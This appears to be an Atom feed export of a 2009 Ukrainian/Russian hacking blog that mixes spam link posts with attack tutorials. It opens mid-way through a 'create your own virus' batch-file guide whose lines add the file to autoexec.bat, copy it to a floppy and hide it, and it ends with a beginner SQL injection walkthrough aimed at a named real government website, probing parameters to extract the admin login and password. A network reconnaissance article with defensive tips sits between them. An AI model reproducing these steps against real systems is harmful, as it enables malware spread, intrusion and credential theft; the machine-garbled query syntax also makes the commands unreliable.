переходим к строке :cool.&lt;br /&gt;Строка echo c:aivus.bat&gt;&gt;c:autoexec.bat добавляет себя в автозапуск.&lt;br /&gt;copy %0 a:open.bat &gt;nul копирует себя(обозначается %0) в a:open.bat Ну а строка attrib +h a:open.bat &gt;nul ставит файлу атрибут скрытый. Если кто-то непонял что значит null, значит - скрыть операцию...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-7095221138414308730?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/7095221138414308730/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=7095221138414308730' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/7095221138414308730'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/7095221138414308730'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/02/blog-post_3740.html' title='Создай свой вирус'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-7165473401425942937</id><published>2009-02-13T01:27:00.001-08:00</published><updated>2009-02-13T01:28:42.983-08:00</updated><title type='text'>Sport</title><content type='html'>&lt;p style="text-align: center; "&gt;&lt;a href="http://www.liveinternet.ru/showjournal.php?journalid=2820528&amp;amp;keywordid=1005558"&gt;&lt;img border="0" width="70" height="70" alt="" src="http://libo.ru/test/abc1/57/s.gif" /&gt;&lt;/a&gt;&lt;a href="http://www.liveinternet.ru/showjournal.php?journalid=2820528&amp;amp;keywordid=1005558"&gt;&lt;img border="0" width="70" height="70" alt="" src="http://libo.ru/test/abc1/57/p.gif" /&gt;&lt;/a&gt;&lt;a href="http://www.liveinternet.ru/showjournal.php?journalid=2820528&amp;amp;keywordid=1005558"&gt;&lt;img border="0" width="70" height="70" alt="" src="http://libo.ru/test/abc1/57/o.gif" /&gt;&lt;/a&gt;&lt;a href="http://www.liveinternet.ru/showjournal.php?journalid=2820528&amp;amp;keywordid=1005558"&gt;&lt;img border="0" width="70" height="70" alt="" src="http://libo.ru/test/abc1/57/r.gif" /&gt;&lt;/a&gt;&lt;a href="http://www.liveinternet.ru/showjournal.php?journalid=2820528&amp;amp;keywordid=1005558"&gt;&lt;img border="0" width="70" height="70" alt="" src="http://libo.ru/test/abc1/57/t.gif" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;br /&gt;&lt;p style="text-align: center; "&gt;&lt;a href="http://www.liveinternet.ru/users/2820528/post96049188/"&gt;&lt;img width="432" height="344" alt="" src="http://img0.liveinternet.ru/images/attach/c/0/39/552/39552044_1234434062_B00000001.jpg" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-7165473401425942937?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/7165473401425942937/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=7165473401425942937' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/7165473401425942937'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/7165473401425942937'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/02/sport.html' title='Sport'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-9045669400318154999</id><published>2009-02-13T01:27:00.000-08:00</published><updated>2009-02-13T01:29:14.984-08:00</updated><title type='text'></title><content type='html'>&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-9045669400318154999?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/9045669400318154999/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=9045669400318154999' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/9045669400318154999'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/9045669400318154999'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/02/blog-post_7037.html' title=''/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-2832735983097805579</id><published>2009-02-13T01:23:00.000-08:00</published><updated>2009-02-13T01:25:37.182-08:00</updated><title type='text'>Компания МТГ</title><content type='html'>Сайт на якому можна замовити :&lt;br /&gt;"Сенсорные киоски", "Световые табло", "Системы информационной безопасности FortiNet", "Система управления очередью AKIS"... і багато чого іншого для замравок, магазинів та супер-маркетів. &lt;br /&gt;А також :     &lt;br /&gt;    * Аренда системы управления очередью&lt;br /&gt;    * Аренда сенсорных киосков&lt;br /&gt;    * Аренда световых табло&lt;br /&gt;    * Аренда оборудования FortiNet&lt;br /&gt;    * Постгарантийное обслуживание&lt;br /&gt;Як веб дизайнер скажу : &lt;br /&gt;-"Не поганий дизайн сайту але...Зайдіть самі подивітся."&lt;br /&gt;&lt;a href='http://mtg-biz.ru'&gt;информационный терминал&lt;/a&gt;, &lt;a href='http://mtg-biz.ru'&gt;система очереди&lt;/a&gt;, &lt;a href='http://mtg-biz.ru'&gt;управление очередями&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-2832735983097805579?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/2832735983097805579/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=2832735983097805579' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/2832735983097805579'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/2832735983097805579'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/02/blog-post_13.html' title='Компания МТГ'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-1783629649624700427</id><published>2009-02-11T06:26:00.000-08:00</published><updated>2009-02-11T06:27:42.161-08:00</updated><title type='text'>Простой и удобный поиск работы</title><content type='html'>Простой и удобный поиск работы, вакансий и резюме в Екатеринбурге, Челябинске, Кургане, Тюмени, Перми, Уфе и других городах Урала. Ежедневно новые вакансии и резюме.&lt;br /&gt;&lt;br /&gt;&lt;a href='http://www.uraljob.ru/'&gt;http://www.uraljob.ru/&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-1783629649624700427?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/1783629649624700427/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=1783629649624700427' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/1783629649624700427'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/1783629649624700427'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/02/blog-post_11.html' title='Простой и удобный поиск работы'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-5591740945938596415</id><published>2009-02-07T03:07:00.000-08:00</published><updated>2009-02-07T03:08:35.038-08:00</updated><title type='text'>Австралия</title><content type='html'>&lt;object type="application/x-shockwave-flash" data="http://widgets.clearspring.com/o/498aeb0c7ab45a17/498bfc458a31da6d/498aed0d0ee776f2/9fb45976" id="W498aeb0c7ab45a17498bfc458a31da6d" width="319" height="433"&gt;&lt;param name="movie" value="http://widgets.clearspring.com/o/498aeb0c7ab45a17/498bfc458a31da6d/498aed0d0ee776f2/9fb45976" /&gt;&lt;param name="wmode" value="transparent" /&gt;&lt;param name="allowNetworking" value="all" /&gt;&lt;param name="allowScriptAccess" value="always" /&gt;&lt;/object&gt;&lt;br /&gt;&lt;a href='http://australia-film-widget.ru/'&gt;новый фильм "Австралия"&lt;/a&gt;&lt;br /&gt;Класний фільм !!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-5591740945938596415?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/5591740945938596415/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=5591740945938596415' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/5591740945938596415'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/5591740945938596415'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/02/blog-post_284.html' title='Австралия'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-8066088884855544450</id><published>2009-02-07T03:01:00.000-08:00</published><updated>2009-02-07T03:03:25.202-08:00</updated><title type='text'>Скануєм по уму</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://tbn3.google.com/images?q=tbn:OuWfeTDV2aFN6M:http://hoststat.ru/scan.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 126px; height: 105px;" src="http://tbn3.google.com/images?q=tbn:OuWfeTDV2aFN6M:http://hoststat.ru/scan.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt; Ця стаття не дасть практично ніякого досвіду, однак вона дійсно важлива для розуміння того, як все влаштовано. Адже без азов не можна в майбутньому написати щось дійсно хороше. Саме ця стаття розповідає, чому xspider корисний, але якщо він нічого не видає, то це не значить, що жертва Невразливий (як вважають 95% початківців зломщиків).&lt;br /&gt;У статті описується саме безпека Linux-систем, так як Windows не зовсім призначений для "глибокої" роботи з мережею.&lt;br /&gt;Отже, приступимо. Почнемо, як я вже казав, з азів. Тобто зі сканування мережі та отримання від неї всієї потрібної нас інформації. Думаю, що всім зрозуміло, як користуватися соц. інженерією. Я не буду заглиблюватися в цей недостойний людини метод і розповім Вам про справжніх сканування мережі.&lt;br /&gt;1) Дуже рідко використовуються, та й мало допомагають бази Whois.&lt;br /&gt;Root @ localhost $ whois foo.com&lt;br /&gt;Domain name: ---&lt;br /&gt;Registar: ---&lt;br /&gt;Referall: bar.com&lt;br /&gt;і т.д. Найбільш корисними рядками будуть registar і referall, т.к. при запиті Whois із зазначенням компанії реєстратора ми отримаємо найбільш повну інформацію. (Root @ localhost $ whois foo.com @ whois.bar.com). Раджу так само застосувати Whois відносно не тільки какого-то домену, але й за певним IP адресою. Саме це допоможе дізнатися такі тонкощі, як останнє оновлення сервера.&lt;br /&gt;2) Ping, Traceroute, Host.&lt;br /&gt;Про PING, мабуть, не треба розповідати. Багато інформації від нього не отримаєш, хоча він завжди під рукою.&lt;br /&gt;Traceroute грунтується на відправленні UDP-пакетів з вказаним Max-Forwards і очікуванні ICMP-відповідей. Шлет пакети на порти в діапазоні від 33434 до 33523. Ми бачимо через які комп'ютери проходили пакети, можемо дізнатися більше про віддаленій машині. І навіть якщо вона не вразлива, то можна попробывать надалі протестувати на безпеку, наприклад, його провайдера.&lt;br /&gt;Host. Головне - отримати якомога більше інформації. І це нам цілком може вдасться, якщо DNS створювалася не вручну.&lt;br /&gt;а) При виклику команди Host з наступними параметрами можна домогтися результатів:&lt;br /&gt;-HINFO вказує конфігурацію сервера, встановлене на нього ПЗ.&lt;br /&gt;-ТХТ додаткова інформація про сервер.&lt;br /&gt;(це далеко не всі параметри, проте саме вони потрібні при скануванні мережі).&lt;br /&gt;б) Оскільки одна машина може працювати некоректно, то створюють вторинні DNS-сервера, які є "запасними". Проблема в тому, що хакер може поряд з адміністратором створити таку DNS. Якщо спочатку ввести host baz.ru, а потім host baz.ru name_of_server (де name_of_server - відповідь на ваш перший запит), то можна отримати список всіх хостів для даного сервера з їх IP.&lt;br /&gt;3) Визначення ОС і запущених процесів.&lt;br /&gt;Сканування портів.&lt;br /&gt;а) Ось те головне, що необхідно при аналізі безпеки комп'ютера. Знаючи всі відкриті порти жертви можна підключатися до неї через різні проксі і дізнаватися, які саме версії програм встановлені на ньому (наприклад старий Sendmail). Так само відкриті порти найкраще дозволяють визначити ОС, однак не варто вірити у всі відкриті порти. Іноді відкривають порти для Windows, коли на сервері стоїть Linux, що вводить багатьох в сум'яття. Кожен порт краще перевірити на дійсну працездатність. Я віддаю перевагу сканувати віддалену машину з допомогою nmap (тим сканером, що був у Матриця 2). Всі параметри ви легко можете знайти в документації.&lt;br /&gt;Треба зауважити, що інформація, яку буде передаватися на ваш комп'ютер при підключенні до комп'ютера жертви може бути підмінила адміністратором і визначити справжню версію ПЗ буде вже не так легко, тому сканування портів може бути недостатньо.&lt;br /&gt;б) Необхідно формувати явно некоректні запити. Тоді відповідь сервера може допомогти з визначенням ОС. Для формування таких запитів я раджу використовувати nmap (і взагалі, nmap краще за інших програм такого роду в усьому, тому потрібно використовувати його як можна більше). Однак і формування запитів не дасть результату, якщо адміністратор поставив Firewall, а це він точно зробив. Однак з'явилося удосконалення попереднього методу. Полягає це вдосконалення в тому, що ми не посилаємо спеціальні запити на сервер, нам досить простого підключення до віддаленої машині. У кожної системи свої конфігурації з'єднання і роботи по протоколу TCP / IP: DF, Windows Size, TOS, TTL. (головні атрибути). Отримуючи їх ми можемо визначити встановлену на віддаленому комп'ютері систему. Якщо ви не вмієте дивитися властивості з'єднання, то зайдіть на сайт subterrain.net, де ви зможете завантажити потрібну програму.&lt;br /&gt;4) Файлова система&lt;br /&gt;Існує цікава можливість зібрати інформацію завдяки NFS, що дозволяє спільно використовувати файли машинам, заснований на Linux. При цьому будь-яка людина може (якщо це не заборонили) підключитися до віддаленої машині і змонтувати (підключити) жорсткий диск жертви до себе з правами користувача root. Якщо таке підключення і заборонили, то команду showmount (що вона робить, мабуть, здогадалися самі) - ймовірно немає. Треба зауважити, що часто необхідно використовувати цю команду з параметрами-а і-е, що покаже всі хости, на які змонтовані файли, а так само всі хости, яким це дозволено.&lt;br /&gt;5) Протокол SNMP&lt;br /&gt;Зупинятися докладно я на ньому не буду, так як він більше придатний для злому (а це тема іншої статті), ніж для збору інформації. Даний протокол дозволяє звертатися до різних мережних пристроїв. Головною проблемою його є те, що багато програм працюють тільки з однією з найбільш ранніх його версій, безпека якої залишає бажати кращого. Програми для роботи з SNMP широко поширені в інтернеті.&lt;br /&gt;6) Протокол ONC RPC&lt;br /&gt;RPC є механізмом, який дозволяє процесам одного комп'ютера викликати деякі процедури на інших комп'ютерах. Цікавим є той факт, що за RPC не встановлюються певні порти, вони самі реєструються в спеціальній службі portmap. Portmap підтримує команду rpcinfo, що дозволяє вам побачити всі запущені RPC процеси на віддаленому комп'ютері. Я і для цього сканування волію використовувати nmap.&lt;br /&gt;Якщо ви ще не зрозуміли, чому не можна (точніше небажано) використовувати сканер безпеки xspider (або будь-який інший йому подібний), то ви були не уважні. А відповідь проста: при скануванні жертва легко може помітити сканування і перекрити доступ до уразливих місць системи, а так само підмінити видавати інформацію, що приведе до повної дезінформації зломщика. Власне кажучи, використовуйте всі методи збору інформації, що може хоч про одному адміністратор забув.&lt;br /&gt;Тепер про те, як не дати зловмисникові дізнатися про те, що його інтересует.Надо помітити, що в линукс досить багато потенційних вразливостей, проте багато з них вирішуються однаковим способом (установкою Firewall, к примеру).&lt;br /&gt;1) Бази даних Whois.&lt;br /&gt;Тут все просто. Не давати їм даних ...&lt;br /&gt;2) Ping, host traceroute&lt;br /&gt;Для відключення PING необхідно налаштувати політику безпеки щодо Echo запитів. Необхідно, щоб таку можливість мали тільки певні вузли. Можна за допомогою Firewall, можна за допомогою політики ipchains (про неї докладно в іншій статті). Можна так само відключити саму службу Echo у файлі / ETC / inetd.conf. Закомментіруйте рядки:&lt;br /&gt;echo stream ...&lt;br /&gt;echo dgram ...&lt;br /&gt;З Host складніше.&lt;br /&gt;а) По-перше, записи в DNS створюйте в ручну. Не пишіть інформацію в поле hinfo. (решта поля за розсудом).&lt;br /&gt;б) При створенні вторинних серверів необхідно у файлі named.conf вказати IP-адреси "дозволених" (як це зробити, написано в документації, але все-таки скажу, що зробити це можна за допомогою allow_transfer:&lt;br /&gt;...&lt;br /&gt;Zone "foo.ru" (&lt;br /&gt;...&lt;br /&gt;Allow-Transfer (ip.ip.ip.ip;);&lt;br /&gt;...&lt;br /&gt;Traceroute: тому що вказати адміністраторам інших комп'ютерів що-небудь ви не можете, то доведеться зробити єдине - заборонити Echo запити та / або встановити Firewall. Тоді зловмисникові буде відправлятися повідомлення про те, що порт недоступний та інформацію про вашу мережі він отримає не всю.&lt;br /&gt;3) Визначення ОС і запущених процесів.&lt;br /&gt;а) Я віддаю перевагу програму з www.psionic.com / abucus / portsentry (як ви вже здогадалися, програма називається PortSentry). Вона допомагає розпізнавати наявність підключення до будь-то порту. Власне, я вже згадував про те, що необхідно відкрити кілька портів з незапущеннимі на них службами (причому портів для різних операційних систем). Так як дуже часто зловмисників хвилюють Telnet і Sendmail, то я опишу те, де зберігається інформація, що видається при підключенні до вашого комп'ютера (версія служби). В файлі sendmail.cf в папці / ETC / необхідно змінити рядок smtpgreetingmessage (це для Sendmail, якщо хтось не здогадався). А для Telnet - / ETC / essue Там треба видалити всю інформацію, яку будуть показувати зловмисникові.&lt;br /&gt;б) Для закриття можливості отримати інформацію, використовую некоректні пакети для запиту, необхідно просто встановити Firewall. При закритті "пасиву" необхідно знову ж таки видавати завідомо неправдиву інформацію. Для / proc/sys/net/ipv4 параметра ip_default _ttl можна написати Echo 1024 і вона буде видавати 1024 при запиті, а на самом деле все не так. Для перегляду інших параметрів застидайтесь вихідні коди системи.&lt;br /&gt;4) Постарайтеся уникати цієї NFS (не як нечисть, звичайно). Якщо все-таки NFS вам потрібен для роботи, то заборонити підключення до порту 2049 для "не своїх". Бажано заборонити доступ до NFS програмами, так як їх безпеку залишає бажати кращого.&lt;br /&gt;5) Буду немногословная. Треба встановити Firewall і заблокувати доступ до портів з SNMP для чужих комп'ютерів. Ну і, звичайно, використовувати як можна більш нові версії SMTP.&lt;br /&gt;6) Закрийте всі непотрібні порти використовую Firewall, відключіть можливість звертатися до portmaper за допомогою все того ж Firewall.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-8066088884855544450?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/8066088884855544450/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=8066088884855544450' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/8066088884855544450'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/8066088884855544450'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/02/blog-post_6143.html' title='Скануєм по уму'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-2493662925729714328</id><published>2009-02-07T02:46:00.000-08:00</published><updated>2009-02-07T02:54:36.866-08:00</updated><title type='text'>Анна Седакова</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://tbn0.google.com/images?q=tbn:btbwmH110DoyEM:http://www.newsmusic.ru/uploads/i/s/sedokova2.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 86px; height: 145px;" src="http://tbn0.google.com/images?q=tbn:btbwmH110DoyEM:http://www.newsmusic.ru/uploads/i/s/sedokova2.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Сайт про знаменитостей .&lt;br /&gt;На ньому можна знайти фото і цікаві історії &lt;br /&gt;про різних знаменитостей .&lt;br /&gt;&lt;a href='http://www.nupokazi.com/tag/anna-sedakova/'&gt;Анна Седакова&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-2493662925729714328?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/2493662925729714328/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=2493662925729714328' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/2493662925729714328'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/2493662925729714328'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/02/blog-post_07.html' title='Анна Седакова'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-3778119357645980790</id><published>2009-02-07T02:38:00.000-08:00</published><updated>2009-02-07T02:45:08.776-08:00</updated><title type='text'>Video Onlane</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.thevideo.ru/video/2009/02/06/890482272.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 212px; height: 300px;" src="http://www.thevideo.ru/video/2009/02/06/890482272.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href='http://www.TheVideo.ru'&gt;фильмы онлайн&lt;/a&gt;&lt;br /&gt;Не поганий але свіжи сайт . На ньом можна подивитись фільми онлайн . А також  закачать собі на на машину . Багато нових і цікавих фільмів та серіалів.&lt;br /&gt;&lt;a href='http://www.TheVideo.ru'&gt;фильмы онлайн&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-3778119357645980790?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/3778119357645980790/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=3778119357645980790' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/3778119357645980790'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/3778119357645980790'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/02/video-onlane.html' title='Video Onlane'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-603623840147905054</id><published>2009-02-04T02:12:00.000-08:00</published><updated>2009-02-04T02:15:44.543-08:00</updated><title type='text'>Чергова SQL ін'єкцій.</title><content type='html'>Привіт хацкери, кул хацкери і новачки! З вами redbu11.В цій статті піде мова про таку вразливості як SQL injection.Я знаю що таких статей в инете немеряно, але все-таки я напишу ще одну статейку про такий уязвімості.Я написав цю статтю для тих у кого ще не сформувалася ідея про цієї вразливості, то є новачкам у цьому деле.То що я буду розповідати, зовсім не нове, Так що розрахована для новічков.Я думаю ви всі знаєте що таке SQL вразливість, а якщо ні, то пошукайте в инете, там багато про це написано, просто если я щас начну пояснювати що це таке у великих подробицях, то це займе багато времені.І так приступимо.))&lt;br /&gt;Для виявлення SQL ін'єкції я найчастіше користуюся маніпулюванням числовими параметрами в GET запросах.Вот наприклад мене як-то зацікавила така посилання:&lt;br /&gt;http://www.komnasfbpi.go.id/berita_eng.php?id=58&lt;br /&gt;тут ID = 58 і є числовий параметр.Ітак, перевіримо її на уязвімость.В кінець посилання додаємо одиночную лапки '. http://www.komnasfbpi.go.id/berita_eng.php?id=58 '&lt;br /&gt;І дивимося на результат.Опа Сторінка завантажилася неправильно і видала нам SQL помилку:&lt;br /&gt;Відкрита база даних: Невірний запит&lt;br /&gt;SELECT * FROM tbl_berita де berita_id = 57 '&lt;br /&gt;Ура! Це і є SQL уязвімость.Но щоб переконатися що вразливість дійсно існує, перевіримо еще кое-что.ПЕреходім знову за адресою:&lt;br /&gt;http://www.komnasfbpi.go.id/berita_eng.php?id=58&lt;br /&gt;І бачимо там сторінку із заголовком "Komnas FBPI ТРИВАЄ пташиного грипу Програма контролю". Ок, тепер перейдемо на сторінку "нижче", не на 58-му а на 57-му, тобто так: http://www.komnasfbpi.go.id/berita_eng.php?id=57&lt;br /&gt;І бачимо там сторінку вже з іншим заголовком "Повітряна Бату Asahan Мешканці підтвердження пташиного грипу&lt;br /&gt;Негативний ". Тепер переходимо назад на 58-ту сторінку:&lt;br /&gt;http://www.komnasfbpi.go.id/berita_eng.php?id=58&lt;br /&gt;Отже, коли ми знаємо, що 58-а сторінка має заголовок "Komnas FBPI ТРИВАЄ пташиного грипу CONTROL ПРОГРАМА "а 57-а має заголовок" Повітряна Бату Asahan Мешканці підтвердження пташиного грипу Негативний "то перевіримо змінну "ID" на вразливість і складемо такий запит:&lt;br /&gt;http://www.komnasfbpi.go.id/berita_eng.php?id=58-1/ *&lt;br /&gt;(Завжди закриваємо символом / *) І дивимося на результат.В результаті завантажилася НЕ 58 а 57 страніца.Ура! Вразливість дійсно є! А що це значить? З попереднім запитом ми спробували виконати просту арифметичну операцію, тобто 58-1, і сайт її не отвільтровал а виконав, і в результаті ми отримали 58-1 = 57, це означає, що замість цього ми можемо вставити будь-який інший запит який нам буде більш полезен.Ми зараз будемо намагатися витягти за допомогою цієї вразливості з бази&lt;br /&gt;даних логін і пас адміна.І так, сначало нам треба з'ясувати скільки полів у базі данних.Я для цього використовую оператор "+ на порядок". І так перевіримо скільки-ж там полів використовуючи + порядку шляхом:&lt;br /&gt;http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + тем по 30 / *&lt;br /&gt;На такий запит нам видалася помилка, це означає що полів менше ніж 30.Пробуем так:&lt;br /&gt;http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + тем по 20 / *&lt;br /&gt;На це нам теж видалася помилка, значить полів менше 20-і.Пробуем далі:&lt;br /&gt;http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + тем по 10 / *&lt;br /&gt;На це нам не видалося жодної помилки, це означає що полів або 10, або більше 10-і.Продалжаем в цьому-ж дусі поки не обнарушем вірне кількість полів:&lt;br /&gt;http://www.komnasfbpi.go.id/berita_eng.php?id=58 + + тем по 15 / *&lt;br /&gt;Сторінка знову завантажилася з помилкою, це означає що полів менше ніж 15, пробуємо так:&lt;br 